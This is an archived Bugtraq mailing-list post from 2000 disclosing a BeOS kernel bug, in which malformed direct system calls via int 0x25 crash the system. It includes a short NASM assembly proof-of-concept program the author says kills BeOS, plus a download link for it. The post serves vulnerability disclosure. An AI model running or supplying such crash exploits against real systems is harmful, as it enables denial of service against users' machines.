|
Bugtraq
mailing list archives
BeOS syscall bug
From: konst () LINUXASSEMBLY ORG (Konstantin Boldyshev)
Date: Mon, 10 Apr 2000 13:16:28 -0000
Summary:
BeOS crashes when system call with invalid parameters is
issued.
Details:
When using direct kernel calls through int 0x25 (not
libroot.so functions) BeOS dies on most system calls with
invalid parameters/stack. Allthough Be has registered this
bug before R5.0, it is present in R5.0, and is present at
least in all R4.5.x
(http://bebugs.be.com/devbugs/detail.php3?oid=2324160).
No fix is available, it's a kernel bug.
Here's a sample assembly program that kills BeOS (nasm):
section .text
global _start
_start:
push dword msg
push dword len
push dword 1 ;stdout
mov eax,3 ;sys_write
int 0x25 ;must be a *call* to int 0x25,
;then everything goes ok; i.e.
;return address must be on the stack,
;but it is not
mov eax,0x3f ;sys_exit
int 0x25
msg db "hello",0xa
len equ $ - msg
(source and binary can be downloaded at
http://linuxassembly.org/BeDie.tgz)
References:
http://www.escribe.com/software/bedevtalk/ - BeDevTalk
archives
(Feb-Mar 2000, search for topics "assembly & BeOS", "system
calls", "system call stress testing"
http://linuxassembly.org - Linux/UNIX assembly programming
portal
 By Date 
By Thread
Current thread:
FreeBSD Security Advisory: FreeBSD-SA-00:12.healthd FreeBSD Security Officer (Apr 10)
Announcement: TrustedBSD Extensions Project Robert Watson (Apr 09)
(Thread continues...)
|
